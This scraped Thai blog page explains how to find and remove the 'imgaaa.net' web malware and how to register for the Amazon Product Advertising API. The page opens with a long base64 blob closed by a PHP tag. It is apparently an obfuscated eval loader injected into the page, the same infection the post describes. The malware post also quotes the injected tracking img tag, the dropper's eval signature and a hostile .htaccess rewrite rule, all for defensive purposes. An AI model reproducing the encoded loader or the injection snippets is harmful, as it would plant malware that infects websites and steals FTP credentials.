1GcfvFy8vfv13f7vQtahNPhpmz7e69hdUH5RdiT3H3ZG63sLR0RU1/SedZCxnEmZtrUVmXWcQmQBfGZCKCnpQ3TBN3xTF85AlXORkc1sL8brKxAyg8gieBilJ5xv4/lXuqeDO4BTrw4PTwaH0cuu6opLqDFt7QSedTRMZrL4Z4xoO9+grq+sowbIhllUHX76NMWoaArSOEYNFDdkip1Xo0GplpL62wx/0G1n0/uDDCUyJbPQK9k01zQHL4vVMxvikY4UyQxDE6A4KY1ruXKbIYKjx2mYyvkczggNWz2fL5d+tCPbFFMUfDfDTgItR+bOWYPhCV9NUQtpLbIrF2k6W1dTxZBK6wSKNGLVRqzcCIr0eRUKylCi2oiXG8kifVWFEmWoquUNybF5I1Okb6tQqgjF6pOmy41YiT6rmmJmylD1SbPlRqJIX9agoCx/rDppUJY/pvtN2k7/7RNEq7s1BuC3aymOiRvoJmxN6knbIVFVaVxqWHUnxCBkcAQ2RzYSoq0z0elVFuMsrmBwA7EvuqNZg8zmDh1AFyiELNNHFX5C1peDjSmmzq5oVu+uIgsvAJtwkgGzWeM6MwerM1hqpiEeGzmkIaVKz8yNyVBlxMBPPnAn6Cq41pIU9afvzeS21LHTbzbjcAZ3tJIkD2R1AghOi+Yb7yNsClsfCx7uZzRffv/nGm7INS2heLfY+dI9g33nK1BsAuqkbx8WLA5D/CzG0GZnHdM1M2wtV0fFUiLlOhGHXiJUnSKPEk9ly8ztgVjI5NQqEJ2rLEPloIj3MXKks6xfqK4OfFgdXNs0yw1Cmq8S3v/R5FVYCCwpDcuzIqUhGDpEQbWeyJcUvj/2IfmSjCZMQhakhBikLFkNjEQGHTTdMn1VSOcFjsuudiYzLUbLmCXY+4zdmKNaubfBcVn0t37CwNSq2lg15ihWoo2MJk+CD1WmBeDDjdo+CI1RNE7RRIJm2HKT+BqLYFnpm4DQN4Iag2C1hrgoGp+8ZNhsZREqp4JoWDx6cH/y2ijIfvybQc+MWOYBPhA0CwWEzkpMVkJ3YSC7rIRlJZCVZOtZFl6ELKcXZMazzHiWGc8y41llPKuMZ5XxrDKeVcazynhWGc8q4zkLiIHKeM6yOUFnPGdJmqAznrUI9zfWRtbkSNFbILJvVlVCaut0WMCNTMLYm9Pzkz4ajbdUMVfeyWtYUpfL739+/ny0K3SvdI14dnMlrIk93pCN72A2i+ly6fu0eX7yZPx+y116Crbt2WoTUypCMAX9pcIhBmi36yVnIeCsWp+QUXKMTeEWDARb5Hyymusk0KA74RsdMMdblMNtyiaug5pldIGGlWd8IMwUDj54v/K6ETWVWZesdJAGJh5Wx5O+Uo1wcad+JMZogjBgZC0pUJszsTkwTsGyy1UmPWCbHzAaPYQsUAa2un+W5f17jJFFh3Kej2wnhGmh0VUyZgz2z9ur6zt8dA+X/7m661Nq74errLW7P2B5rgC2vxhTPXdhId245GjZ7MQfrE9pebSMV4Sn7t3AEOi6fvXuw+v07i3YwiVLsPGSVQ7Gu3hBPVzViXHUEMaf7pRBpSldTusY7RXv/AHHJhSH2ouXhqKO7sySs9PkeE4Od1efPlUAVTcNKHNANQ/IpgF1Duh3O+l4xL2cseOTpvg9Oi6Ww/ew/bOpk847W7p/GCfZG/hKQEKhw+m099OnSiVnU9rjynsRQZ75/oSL76F/O7OXKRnNg+WMlboDbZ8V7yhl1ynDhWt6nzLeqJ64VOlGdDVAju5UWjaiVA930ERbjmG0jHdigV3rTWemsdGMWLyO8IDaJtSONUNWZa768VZW2ZBwKF1khf4/mSjAQU/P/38AmMU4NrC1wJwiYRgOk5dfwV/UO/k/6QMUUQ=='))); ?>

เว็บมัลแวร์ "imgaaa.net" (Web-Malware Spoofing Images )

Written on 1:51 PM by ปั้มเงิน Cookie Run

ว่าด้วยเรื่อง เว็บมัลแวร์ imgaaa.net ซึ่งกำลังระบาดอยู่ในตอนนี้ เชื่อว่าหลายๆเว็บกำลังเจอกันอยู่จนทำให้เว็บไม่สามารถเข้าได้ผ่าน Mozilla Firefox หรือ ถูกแจ้งว่าเป็นเว็บไซต์อันตรายจาก Google ซึ่งลักษณะการทำงานของ imgaaa.net จะมีลักษณะการทำงานเหมือน trojan หรือ sniffer ที่ค่อยดักข้อมูลการรับส่งผ่าน FTP ที่เรากำลังใช้งาน โดยเว็บหรือหน้าเพจที่ติด เว็บมัลแวร์ ตัวนี้จะถูกแทรกด้วย Code
<img border="0" heigth="1" src="http://imgaaa.net/t.php?id=36910902" width="1" />

โดยวิธีการแก้ หรือ ตรวจหาเว็บมัลแวร์ imgaaa.net  มีดังนี้
1. FTP เข้าสู่เว็บของท่าน

2.
ทำการค้นหาไฟล์ "21.php" ถ้ามีเมื่อเปิดดูจะพบ Code<? eval(gzuncompress(base64_decode( ซึ่งมันจะทำการแพร่กระจายเว็บมัลแวร์ ดังกล่าวไปยังไฟล์ต่างๆ โดยไฟล์ที่โดนบ่อยคือไฟล์ Index.php,Index.html หรือ police.php ซึ่งมันจะทำการแทรก Code
<img border="0" heigth="1" src="http://imgaaa.net/t.php?id=36910902" width="1" /> ในบรรทัดสุดท้ายของไฟล์ที่โดน

3.
วิธีการลบ หรือจัดการกับเว็บมัลแวร์ "imgaaa.net" นั้นทำได้โดยง่าย คือลบ Code ดังกล่าวออกไป หรือจะอัพโหลด ไฟล์เก่าที่มีขึ้นไปแทนก็ได้ แต่คนที่สามารถ PuTTY ไปที่ SV. ได้นั้น สามารถใช้คำสั่ง grep -lr imgaaa.net เพื่อทำการค้นหาไฟล์ที่ติดเว็บมัลแวร์ตัวนี้ได้ ซึ่งมันน่าจะสะดวกกว่าการเปิดหาเองทีละไฟล์

4.
สุดท้ายถ้าเว็บคุณมีไฟล์ “.htaccess” อย่าลืมลองเปิดดูว่ามี Code RewriteRule ^(.*)$ /wp-admin/21.php?q=$1 อยู่หรือไม่ หากมีให้ลบออกไป เพราะไม่งั้นเว็บของคุณ อาจจะเข้าใช้งานไม่ได้ครับ

คำแนะนำ
สำหรับคนที่ใช้ CMS สำเร็จรูปควรมีการอัพเดพระบบอยู่เสมอ เพื่อแก้ไขช่องโหว่ต่างๆที่ถูกพบ และในกรณีที่ติด เว็บมัลแวร์ ไปแล้วก็ควรรีบแก้ปัญหาและเปลี่ยนรหัสผ่านการเข้าใช้ FTP ทันที เพราะเว็บมัลแวร์อาจเข้ามาแพร่กระจ่ายต่อผ่าน FTP ที่ตุณเข้าใช้ก็ได้....

วิธีสมัคร Amazon API หรือ Product Advertising API

Written on 9:41 PM by ปั้มเงิน Cookie Run

วิธีสมัคร Amazon API หรือ Product Advertising API
วันนี้ผมจะเสนอวิธีการสมัคร Amazon API หรือ Product Advertising API สำหรับคนที่สนใจจะหารายได้กับ Amazon ให้มือใหม่ได้เป็นตัวอย่าง เพราะถ้าไม่นำเสนอวิธีการสมัครในครั้ง ผมเชื่อว่าคงมีอีกหลายๆ ท่านคงสับสน หรือ งง ไปเลย เพราะครั้งแรกที่ผมเริ่มทำก็งมทางอยู่นานเช่นกันครับ
Amazon API คือออะไร ทำไมต้องสมัคร เพื่อขอ Access Key ID และ Secret Access Key ถ้าพูดแบบเป็นหลักการเพื่อนๆคงงงกันแน่ งั้นเรามาพูดแบบชาวบ้านกัน กล่าวคือ Amazon API คือ ตัวกลางที่เราจะใช้เพื่อดึงข้อมูล ต่างๆ หรือสินค้า จาก Amazon เพื่อมาแสดงที่เว็บที่เราทำ แทนการโพสหรือ Copy เนื้อหาด้วยมือมาลงนั้นเอง หุๆ ขอบอกสะดวกมากมายเลยล่ะ เพราะมีโปรแกรม, plugin, หรือชุดคำสั่งมากมาย ที่เพียงเรานำข้อมูล Amazon API  มาใส่ แล้วตั้งค่านิดหน่อย ระบบก็ต้องค่อยๆนำสินค้ามากมายมาลงยังเว็บเรา ฮ่าๆ อย่างสมัครกันแล้วล่ะสิ งั้นเรามาเข้าสู่ขั้นตอนการสมัคร Amazon API กันเลย

ขั้นตอนการสมัคร Amazon API กันเลย
1. ไปที่ Amazon Web Services หรือ
https://aws-portal.amazon.com/gp/aws/developer/registration/index.html
แล้วใส่ ใส่ username, password ที่เราได้สมัคร Amazon Associates ในครั้งก่อน

2. ใส่เว็บไซต์เราเข้า และรายระเอียดของเว็บที่เราจะใช้ Amazon API (ที่จริงเว็บอะไรก็ได้ แต่เว็บที่เราใช้ล่ะดีที่สุด กันโดนตรวจสอบ) เมื่อใส่ข้อมูลให้ครบ แล้วกด ปุ่ม complete registation

3. และจะมาสู่หน้านี้ ให้เลือก Manage Your Account


4. หน้านี้มา ให้เลือกหัวข้อ  Access Identifiers กดคำว่า Click here
5. จะมาสู่หน้า Access Credentials ให้คลิก Show ในช่อง Secret Access Key และเราก็จะได้ค่าของ Amazon API คือ Access Key ID และ Secret Access Key

6. ทำการจดบันทึกไว้ หรือจะกลับเขามาดูภายหลังก็ได้ครับที่ต้องการ เสร็จแล้วครับ กับ วิธีสมัคร Amazon API หรือ Product Advertising API

X Close